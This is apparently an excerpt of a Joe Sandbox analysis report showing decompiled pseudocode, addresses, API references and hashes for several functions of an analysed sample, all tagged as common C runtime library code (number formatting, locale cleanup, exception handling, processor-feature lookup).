                                                                                                                                                                                                        C-Code - Quality: 76%
                                                                                                                                                                                                        			E0041E9F0(void* __ebx, intOrPtr __ecx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, signed char _a20, signed int _a24) {
				signed char _v8;
				signed int _v12;
				intOrPtr _v16;
				int _v20;
				long _v132;
				char _v140;
				intOrPtr _v144;
				signed int _v145;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				signed char _v164;
				signed char _t78;
				void* _t92;
				signed int _t106;
				void* _t117;
				void* _t118;
				void* _t119;

				_t118 = __esi;
				_t117 = __edi;
				_t92 = __ebx;
				_v152 = __ecx;
				_v20 = 0x6c;
				if(E0041E9D0(_a16) > 0 || (E0041D420(_a16) & 0x00002000) != 0) {
					_v156 = E0041E9D0(_a16);
				} else {
					_v156 = 6;
				}
				_v16 = _v156;
				if(_v16 <= 0x24) {
					_v160 = _v16;
				} else {
					_v160 = 0x24;
				}
				_v144 = _v160;
				_v16 = _v16 - _v144;
				_v8 = 0;
				_v12 = 0;
				_t78 = E0041D420(_a16) & 0x00003000;
				if(_t78 == 0x2000) {
					asm("fldz");
					asm("fcomp qword [ebp+0x1c]");
					asm("fnstsw ax");
					if((_t78 & 0x00000041) != 0) {
						_v164 = 0;
					} else {
						_v164 = 1;
					}
					_v145 = _v164;
					if((_v145 & 0x000000ff) != 0) {
						asm("fchs");
					}
					while(1) {
						asm("fcomp qword [0x421980]");
						asm("fnstsw ax");
						if((_t78 & 0x00000001) != 0 || _v8 >= 0x1388) {
							break;
						}
						_a24 = _a24 /  *0x421978;
						_t78 = _v8 + 0xa;
						_v8 = _t78;
					}
					asm("fcomp qword [0x421988]");
					asm("fnstsw ax");
					__eflags = _t78 & 0x00000041;
					if((_t78 & 0x00000041) == 0) {
						while(1) {
							__eflags = _v16 - 0xa;
							if(_v16 < 0xa) {
								goto L25;
							}
							asm("fcomp qword [ebp+0x1c]");
							asm("fnstsw ax");
							__eflags = _t78 & 0x00000001;
							if((_t78 & 0x00000001) == 0) {
								__eflags = _v12 - 0x1388;
								if(_v12 < 0x1388) {
									_a24 = _a24 *  *0x421978;
									_v16 = _v16 - 0xa;
									_t106 = _v12 + 0xa;
									__eflags = _t106;
									_v12 = _t106;
									continue;
								}
							}
							goto L25;
						}
					}
					L25:
					__eflags = _v145 & 0x000000ff;
					if((_v145 & 0x000000ff) != 0) {
						asm("fchs");
					}
				}
				 *(_t119 - 8) = _a24;
				_push(_v144);
				E0041ED90(_t92, _t117, _t118, __eflags, _v152, _a4, _a8, _a12, _a16, _a20 & 0x000000ff,  &_v132, _v8, _v12, _v16, swprintf( &_v132, 0x6c, E0041ECB0(_v152,  &_v140, 0x4c, E0041D420(_a16))));
				return _a4;
			}





















                                                                                                                                                                                                        0x0041e9f0
                                                                                                                                                                                                        0x0041e9f0
                                                                                                                                                                                                        0x0041e9f0
                                                                                                                                                                                                        0x0041e9f9
                                                                                                                                                                                                        0x0041e9ff
                                                                                                                                                                                                        0x0041ea10
                                                                                                                                                                                                        0x0041ea35
                                                                                                                                                                                                        0x0041ea21
                                                                                                                                                                                                        0x0041ea21
                                                                                                                                                                                                        0x0041ea21
                                                                                                                                                                                                        0x0041ea41
                                                                                                                                                                                                        0x0041ea48
                                                                                                                                                                                                        0x0041ea59
                                                                                                                                                                                                        0x0041ea4a
                                                                                                                                                                                                        0x0041ea4a
                                                                                                                                                                                                        0x0041ea4a
                                                                                                                                                                                                        0x0041ea65
                                                                                                                                                                                                        0x0041ea74
                                                                                                                                                                                                        0x0041ea77
                                                                                                                                                                                                        0x0041ea7e
                                                                                                                                                                                                        0x0041ea8d
                                                                                                                                                                                                        0x0041ea97
                                                                                                                                                                                                        0x0041ea9d
                                                                                                                                                                                                        0x0041ea9f
                                                                                                                                                                                                        0x0041eaa2
                                                                                                                                                                                                        0x0041eaa7
                                                                                                                                                                                                        0x0041eab5
                                                                                                                                                                                                        0x0041eaa9
                                                                                                                                                                                                        0x0041eaa9
                                                                                                                                                                                                        0x0041eaa9
                                                                                                                                                                                                        0x0041eac5
                                                                                                                                                                                                        0x0041ead4
                                                                                                                                                                                                        0x0041ead9
                                                                                                                                                                                                        0x0041eadb
                                                                                                                                                                                                        0x0041eae9
                                                                                                                                                                                                        0x0041eaec
                                                                                                                                                                                                        0x0041eaf2
                                                                                                                                                                                                        0x0041eaf7
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041eb0b
                                                                                                                                                                                                        0x0041eae3
                                                                                                                                                                                                        0x0041eae6
                                                                                                                                                                                                        0x0041eae6
                                                                                                                                                                                                        0x0041eb13
                                                                                                                                                                                                        0x0041eb19
                                                                                                                                                                                                        0x0041eb1b
                                                                                                                                                                                                        0x0041eb1e
                                                                                                                                                                                                        0x0041eb2b
                                                                                                                                                                                                        0x0041eb2b
                                                                                                                                                                                                        0x0041eb2f
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041eb37
                                                                                                                                                                                                        0x0041eb3a
                                                                                                                                                                                                        0x0041eb3c
                                                                                                                                                                                                        0x0041eb3f
                                                                                                                                                                                                        0x0041eb41
                                                                                                                                                                                                        0x0041eb48
                                                                                                                                                                                                        0x0041eb53
                                                                                                                                                                                                        0x0041eb5c
                                                                                                                                                                                                        0x0041eb25
                                                                                                                                                                                                        0x0041eb25
                                                                                                                                                                                                        0x0041eb28
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041eb28
                                                                                                                                                                                                        0x0041eb48
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0041eb3f
                                                                                                                                                                                                        0x0041eb2b
                                                                                                                                                                                                        0x0041eb61
                                                                                                                                                                                                        0x0041eb68
                                                                                                                                                                                                        0x0041eb6a
                                                                                                                                                                                                        0x0041eb6f
                                                                                                                                                                                                        0x0041eb71
                                                                                                                                                                                                        0x0041eb6a
                                                                                                                                                                                                        0x0041eb7a
                                                                                                                                                                                                        0x0041eb83
                                                                                                                                                                                                        0x0041ebe1
                                                                                                                                                                                                        0x0041ebef

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: swprintf
                                                                                                                                                                                                        • String ID: $$$$l
                                                                                                                                                                                                        • API String ID: 233258989-1469801561
                                                                                                                                                                                                        • Opcode ID: 6c3cea097df9fc190284f711e3ab54a8029797d0ea474b246fe7d57bb776c220
                                                                                                                                                                                                        • Instruction ID: 1cc828687bb7214b2eca30bed96952f9c294d2619a15095886b1142353ba247c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 6c3cea097df9fc190284f711e3ab54a8029797d0ea474b246fe7d57bb776c220
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 32518DB4D0011DDBDF14CF56E955BEE7BB5BF44300F00819AE999A2281CB389AE1CF19
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00408971 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 112COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 82%
                                                                                                                                                                                                        			E00408971(char _a4) {
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t24;
				intOrPtr* _t25;
				intOrPtr _t26;
				intOrPtr* _t27;
				intOrPtr* _t28;
				intOrPtr* _t44;
				intOrPtr* _t45;
				intOrPtr* _t46;
				void* _t65;
				intOrPtr* _t66;
				intOrPtr* _t67;
				char _t69;

				_t69 = _a4;
				_t2 = _t69 + 0xbc; // 0x75ff3e83
				_t24 =  *_t2;
				if(_t24 == 0 || _t24 == 0x429064) {
					L11:
					_t10 = _t69 + 0xc0; // 0x6cbbe813
					_t25 =  *_t10;
					if(_t25 != 0) {
						_t81 =  *_t25;
						if( *_t25 == 0) {
							_t11 = _t69 + 0xc4; // 0x3883ffff
							_push( *_t11 - 0xfe);
							E00406C4C(0, _t65, _t69, _t81);
							_t12 = _t69 + 0xcc; // 0xe83fb0cf
							_push( *_t12 - 0x80);
							E00406C4C(0, 0x80, _t69, _t81);
							_t13 = _t69 + 0xd0; // 0xffffff64
							_t41 =  *_t13 - 0x80;
							_push( *_t13 - 0x80);
							E00406C4C(0, 0x80, _t69, _t41);
							_t14 = _t69 + 0xc0; // 0x6cbbe813
							_push( *_t14);
							E00406C4C(0, 0x80, _t69, _t41);
						}
					}
					_t15 = _t69 + 0xd4; // 0x412d77
					_t66 = _t15;
					_t26 =  *_t66;
					if(_t26 != 0x429858) {
						_t84 =  *((intOrPtr*)(_t26 + 0xb4));
						if( *((intOrPtr*)(_t26 + 0xb4)) == 0) {
							E0040FDAB(_t26);
							_push( *_t66);
							E00406C4C(0, _t66, _t69, _t84);
						}
					}
					_t17 = _t69 + 0x50; // 0x412cf3
					_t67 = _t17;
					_a4 = 6;
					do {
						if( *((intOrPtr*)(_t67 - 8)) != 0x429530) {
							_t27 =  *_t67;
							if(_t27 != 0) {
								_t87 =  *_t27;
								if( *_t27 == 0) {
									_push(_t27);
									E00406C4C(0, _t67, _t69, _t87);
								}
							}
						}
						if( *((intOrPtr*)(_t67 - 4)) != 0) {
							_t21 = _t67 + 4; // 0x51c0be0f
							_t28 =  *_t21;
							if(_t28 != 0) {
								_t90 =  *_t28;
								if( *_t28 == 0) {
									_push(_t28);
									E00406C4C(0, _t67, _t69, _t90);
								}
							}
						}
						_t67 = _t67 + 0x10;
						_t22 =  &_a4;
						 *_t22 = _a4 - 1;
						_t91 =  *_t22;
					} while ( *_t22 != 0);
					_push(_t69);
					return E00406C4C(0, _t67, _t69, _t91);
				} else {
					_t3 = _t69 + 0xb0; // 0x84dff03
					_t44 =  *_t3;
					if(_t44 != 0 &&  *_t44 == 0) {
						_t4 = _t69 + 0xb8; // 0x43ffffff
						_t45 =  *_t4;
						if(_t45 != 0) {
							_t77 =  *_t45;
							if( *_t45 == 0) {
								_push(_t45);
								E00406C4C(0, _t65, _t69, _t77);
								_t5 = _t69 + 0xbc; // 0x75ff3e83
								E004101C8( *_t5);
							}
						}
						_t6 = _t69 + 0xb4; // 0x7de8cf8b
						_t46 =  *_t6;
						if(_t46 != 0) {
							_t79 =  *_t46;
							if( *_t46 == 0) {
								_push(_t46);
								E00406C4C(0, _t65, _t69, _t79);
								_t7 = _t69 + 0xbc; // 0x75ff3e83
								E0040FFB9( *_t7);
							}
						}
						_t8 = _t69 + 0xb0; // 0x84dff03
						_push( *_t8);
						E00406C4C(0, _t65, _t69, _t79);
						_t9 = _t69 + 0xbc; // 0x75ff3e83
						_push( *_t9);
						E00406C4C(0, _t65, _t69, _t79);
					}
					goto L11;
				}
			}



















                                                                                                                                                                                                        0x00408978
                                                                                                                                                                                                        0x0040897b
                                                                                                                                                                                                        0x0040897b
                                                                                                                                                                                                        0x00408986
                                                                                                                                                                                                        0x004089f7
                                                                                                                                                                                                        0x004089f7
                                                                                                                                                                                                        0x004089f7
                                                                                                                                                                                                        0x004089ff
                                                                                                                                                                                                        0x00408a01
                                                                                                                                                                                                        0x00408a03
                                                                                                                                                                                                        0x00408a05
                                                                                                                                                                                                        0x00408a10
                                                                                                                                                                                                        0x00408a11
                                                                                                                                                                                                        0x00408a16
                                                                                                                                                                                                        0x00408a23
                                                                                                                                                                                                        0x00408a24
                                                                                                                                                                                                        0x00408a29
                                                                                                                                                                                                        0x00408a2f
                                                                                                                                                                                                        0x00408a31
                                                                                                                                                                                                        0x00408a32
                                                                                                                                                                                                        0x00408a37
                                                                                                                                                                                                        0x00408a37
                                                                                                                                                                                                        0x00408a3d
                                                                                                                                                                                                        0x00408a42
                                                                                                                                                                                                        0x00408a03
                                                                                                                                                                                                        0x00408a45
                                                                                                                                                                                                        0x00408a45
                                                                                                                                                                                                        0x00408a4b
                                                                                                                                                                                                        0x00408a52
                                                                                                                                                                                                        0x00408a54
                                                                                                                                                                                                        0x00408a5a
                                                                                                                                                                                                        0x00408a5d
                                                                                                                                                                                                        0x00408a62
                                                                                                                                                                                                        0x00408a64
                                                                                                                                                                                                        0x00408a6a
                                                                                                                                                                                                        0x00408a5a
                                                                                                                                                                                                        0x00408a6b
                                                                                                                                                                                                        0x00408a6b
                                                                                                                                                                                                        0x00408a6e
                                                                                                                                                                                                        0x00408a75
                                                                                                                                                                                                        0x00408a7c
                                                                                                                                                                                                        0x00408a7e
                                                                                                                                                                                                        0x00408a82
                                                                                                                                                                                                        0x00408a84
                                                                                                                                                                                                        0x00408a86
                                                                                                                                                                                                        0x00408a88
                                                                                                                                                                                                        0x00408a89
                                                                                                                                                                                                        0x00408a8e
                                                                                                                                                                                                        0x00408a86
                                                                                                                                                                                                        0x00408a82
                                                                                                                                                                                                        0x00408a92
                                                                                                                                                                                                        0x00408a94
                                                                                                                                                                                                        0x00408a94
                                                                                                                                                                                                        0x00408a99
                                                                                                                                                                                                        0x00408a9b
                                                                                                                                                                                                        0x00408a9d
                                                                                                                                                                                                        0x00408a9f
                                                                                                                                                                                                        0x00408aa0
                                                                                                                                                                                                        0x00408aa5
                                                                                                                                                                                                        0x00408a9d
                                                                                                                                                                                                        0x00408a99
                                                                                                                                                                                                        0x00408aa6
                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aa9
                                                                                                                                                                                                        0x00408aae
                                                                                                                                                                                                        0x00408ab9
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x0040898f
                                                                                                                                                                                                        0x00408997
                                                                                                                                                                                                        0x0040899d
                                                                                                                                                                                                        0x0040899d
                                                                                                                                                                                                        0x004089a5
                                                                                                                                                                                                        0x004089a7
                                                                                                                                                                                                        0x004089a9
                                                                                                                                                                                                        0x004089ab
                                                                                                                                                                                                        0x004089ac
                                                                                                                                                                                                        0x004089b1
                                                                                                                                                                                                        0x004089b7
                                                                                                                                                                                                        0x004089bd
                                                                                                                                                                                                        0x004089a9
                                                                                                                                                                                                        0x004089be
                                                                                                                                                                                                        0x004089be
                                                                                                                                                                                                        0x004089c6
                                                                                                                                                                                                        0x004089c8
                                                                                                                                                                                                        0x004089ca
                                                                                                                                                                                                        0x004089cc
                                                                                                                                                                                                        0x004089cd
                                                                                                                                                                                                        0x004089d2
                                                                                                                                                                                                        0x004089d8
                                                                                                                                                                                                        0x004089de
                                                                                                                                                                                                        0x004089ca
                                                                                                                                                                                                        0x004089df
                                                                                                                                                                                                        0x004089df
                                                                                                                                                                                                        0x004089e5
                                                                                                                                                                                                        0x004089ea
                                                                                                                                                                                                        0x004089ea
                                                                                                                                                                                                        0x004089f0
                                                                                                                                                                                                        0x004089f6
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408997

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: ___free_lc_time___free_lconv_mon___free_lconv_num
                                                                                                                                                                                                        • String ID: x-B
                                                                                                                                                                                                        • API String ID: 1156122516-492542633
                                                                                                                                                                                                        • Opcode ID: 07e95b2470654b56678c1bc6ff5b4bb992fb34b1b314214da6c134c30319a2a4
                                                                                                                                                                                                        • Instruction ID: a99e5749659e9c2460926f20187b856dc92dc98678e4cb8a4d7f7645dcd8d333
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 07e95b2470654b56678c1bc6ff5b4bb992fb34b1b314214da6c134c30319a2a4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 2C31A2722043419FEB24BF64DA81A6777A6EB00314F15083FE585B76A1CF3DAC50CA2D
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 004082AE Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 28%
                                                                                                                                                                                                        			E004082AE(void* __ebx, void* __ecx, void* __edx, intOrPtr* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				void* __ebp;
				void* _t20;
				void* _t22;
				void* _t23;
				void* _t25;
				intOrPtr* _t26;
				void* _t27;
				void* _t28;

				_t27 = __esi;
				_t26 = __edi;
				_t25 = __edx;
				_t23 = __ecx;
				_t22 = __ebx;
				_t30 = _a20;
				if(_a20 != 0) {
					_push(_a20);
					_push(__ebx);
					_push(__esi);
					_push(_a4);
					E0040821C(__ebx, __edi, __esi, _t30);
					_t28 = _t28 + 0x10;
				}
				_t31 = _a28;
				_push(_a4);
				if(_a28 != 0) {
					_push(_a28);
				} else {
					_push(_t27);
				}
				E00404949(_t23);
				_push( *_t26);
				_push(_a16);
				_push(_a12);
				_push(_t27);
				E00407C86(_t22, _t25, _t26, _t27, _t31);
				_push(0x100);
				_push(_a24);
				_push(_a16);
				 *((intOrPtr*)(_t27 + 8)) =  *((intOrPtr*)(_t26 + 4)) + 1;
				_push(_a8);
				_push(_t27);
				_push(_a4);
				_t20 = E00407F01(_t22,  *((intOrPtr*)(_t22 + 0xc)), _t25, _t26, _t27, _t31);
				if(_t20 != 0) {
					E00404910(_t20, _t27);
					return _t20;
				}
				return _t20;
			}











                                                                                                                                                                                                        0x004082ae
                                                                                                                                                                                                        0x004082ae
                                                                                                                                                                                                        0x004082ae
                                                                                                                                                                                                        0x004082ae
                                                                                                                                                                                                        0x004082ae
                                                                                                                                                                                                        0x004082b3
                                                                                                                                                                                                        0x004082b7
                                                                                                                                                                                                        0x004082b9
                                                                                                                                                                                                        0x004082bc
                                                                                                                                                                                                        0x004082bd
                                                                                                                                                                                                        0x004082be
                                                                                                                                                                                                        0x004082c1
                                                                                                                                                                                                        0x004082c6
                                                                                                                                                                                                        0x004082c6
                                                                                                                                                                                                        0x004082c9
                                                                                                                                                                                                        0x004082cd
                                                                                                                                                                                                        0x004082d0
                                                                                                                                                                                                        0x004082d5
                                                                                                                                                                                                        0x004082d2
                                                                                                                                                                                                        0x004082d2
                                                                                                                                                                                                        0x004082d2
                                                                                                                                                                                                        0x004082d8
                                                                                                                                                                                                        0x004082dd
                                                                                                                                                                                                        0x004082df
                                                                                                                                                                                                        0x004082e2
                                                                                                                                                                                                        0x004082e5
                                                                                                                                                                                                        0x004082e6
                                                                                                                                                                                                        0x004082ee
                                                                                                                                                                                                        0x004082f3
                                                                                                                                                                                                        0x004082f7
                                                                                                                                                                                                        0x004082fa
                                                                                                                                                                                                        0x004082fd
                                                                                                                                                                                                        0x00408303
                                                                                                                                                                                                        0x00408304
                                                                                                                                                                                                        0x00408307
                                                                                                                                                                                                        0x00408311
                                                                                                                                                                                                        0x00408315
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x00408315
                                                                                                                                                                                                        0x0040831b

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • ___BuildCatchObject.LIBCMT ref: 004082C1
                                                                                                                                                                                                          • Part of subcall function 0040821C: ___BuildCatchObjectHelper.LIBCMT ref: 00408252
                                                                                                                                                                                                        • _UnwindNestedFrames.LIBCMT ref: 004082D8
                                                                                                                                                                                                        • ___FrameUnwindToState.LIBCMT ref: 004082E6
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: BuildCatchObjectUnwind$FrameFramesHelperNestedState
                                                                                                                                                                                                        • String ID: csm
                                                                                                                                                                                                        • API String ID: 2163707966-1018135373
                                                                                                                                                                                                        • Opcode ID: 27eecc3899bbe1063533d20d8d1912ab6fac83b2e668249a59cd09534d133364
                                                                                                                                                                                                        • Instruction ID: 1dfc0ea3400c4455fdf0f17d03e66b9e07ee6fd977abe97b374ecae1b492f4c5
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 27eecc3899bbe1063533d20d8d1912ab6fac83b2e668249a59cd09534d133364
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8C0186B1000109BBDF126F52CD01EAB3F2AEF48354F00402AFD48212A1DB3A98B1DBA9
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 0040B1DD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 65%
                                                                                                                                                                                                        			E0040B1DD() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x4224d8;
					_v28 =  *0x4224d0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}







                                                                                                                                                                                                        0x0040b1e2
                                                                                                                                                                                                        0x0040b1ea
                                                                                                                                                                                                        0x0040b201
                                                                                                                                                                                                        0x0040b1ad
                                                                                                                                                                                                        0x0040b1b6
                                                                                                                                                                                                        0x0040b1c2
                                                                                                                                                                                                        0x0040b1c5
                                                                                                                                                                                                        0x0040b1c8
                                                                                                                                                                                                        0x0040b1ca
                                                                                                                                                                                                        0x0040b1cd
                                                                                                                                                                                                        0x0040b1d2
                                                                                                                                                                                                        0x0040b1dc
                                                                                                                                                                                                        0x0040b1d4
                                                                                                                                                                                                        0x0040b1d8
                                                                                                                                                                                                        0x0040b1d8
                                                                                                                                                                                                        0x0040b1ec
                                                                                                                                                                                                        0x0040b1f2
                                                                                                                                                                                                        0x0040b1fa
                                                                                                                                                                                                        0x00000000
                                                                                                                                                                                                        0x0040b1fc
                                                                                                                                                                                                        0x0040b1fc
                                                                                                                                                                                                        0x0040b200
                                                                                                                                                                                                        0x0040b200
                                                                                                                                                                                                        0x0040b1fa

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetModuleHandleA.KERNEL32(KERNEL32,00404587), ref: 0040B1E2
                                                                                                                                                                                                        • GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 0040B1F2
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_a4758283.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: AddressHandleModuleProc
                                                                                                                                                                                                        • String ID: IsProcessorFeaturePresent$KERNEL32
                                                                                                                                                                                                        • API String ID: 1646373207-3105848591
                                                                                                                                                                                                        • Opcode ID: 8617d92d3f2ccbb5be22d6de85dfeec639d68f29d2bcc8af3ae5310be24a9569
                                                                                                                                                                                                        • Instruction ID: f0c37bf17db3da10c81435578386e460196ae04845272ef35ed2d2751b5da840
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8617d92d3f2ccbb5be22d6de85dfeec639d68f29d2bcc8af3ae5310be24a9569
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 87F01D30A10A09E2DF102BA1BD0E66F7A75FB80746FD104A1E592F00D4DF7590B6929E
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        Function 00403CA3 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 28COMMONLIBRARYCODE
                                                                                                                                                                                                        Download Yara Rule
                                                                                                                                                                                                        C-Code - Quality: 71%
                                                                                                                                                                                                        			E00403CA3(void* __ebx, void* __edi, void* __esi, void* __eflags) {
				signed int _v12;
				intOrPtr _v16;
				char _v48;
				char _v88;
				intOrPtr* _t19;
				intOrPtr* _t22;

				_push(0x44);
				E00406CE9(E00417370, __ebx, __edi, __esi);
				E00401030( &_v48, "invalid string position");
				_v12 = _v12 & 0x00000000;
				_t19 =  &_v88;
				E00403C1C(_t19,  &_v48);
				E00404EFB( &_v88, 0x424b90);
				asm("int3");
				_push(__esi);
				_t22 = _t19;
				E00401DE0(_t19, _v16);
				 *_t22 = 0x421ad4;
				return _t22;
			}









                                                                                                                                                                                                        0x00403ca3
                                                                                                                                                                                                        0x00403caa
                                                                                                                                                                                                        0x00403cb7
                                                                                                                                                                                                        0x00403cbc
                                                                                                                                                                                                        0x00403cc4
                                                                                                                                                                                                        0x00403cc7
                                                                                                                                                                                                        0x00403cd5
                                                                                                                                                                                                        0x00403cda
                                                                                                                                                                                                        0x00403ce0
                                                                                                                                                                                                        0x00403ce4
                                                                                                                                                                                                        0x00403ce6
                                                                                                                                                                                                        0x00403ceb
                                                                                                                                                                                                        0x00403cf5

                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • __EH_prolog3.LIBCMT ref: 00403CAA
                                                                                                                                                                                                        • std::bad_exception::bad_exception.LIBCMT ref: 00403CC7
                                                                                                                                                                                                        • __CxxThrowException@8.LIBCMT ref: 00403CD5
                                                                                                                                                                                                          • Part of subcall function 00404EFB: RaiseException.KERNEL32(?,?,00406831,004021F3,?,?,?,?,00406831,004021F3,00424938,0042A754,004021F3,00000000,00000000), ref: 00404F3D
                                                                                                                                                                                                          • Part of subcall function 00401DE0: std::exception::exception.LIBCMT ref: 00401DEE
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        • invalid string position, xrefs: 00403CAF
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.360994414.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000003.00000002.360989756.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361015676.0000000000421000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361022103.0000000000426000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        • Associated: 00000003.00000002.361029381.000000000042D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
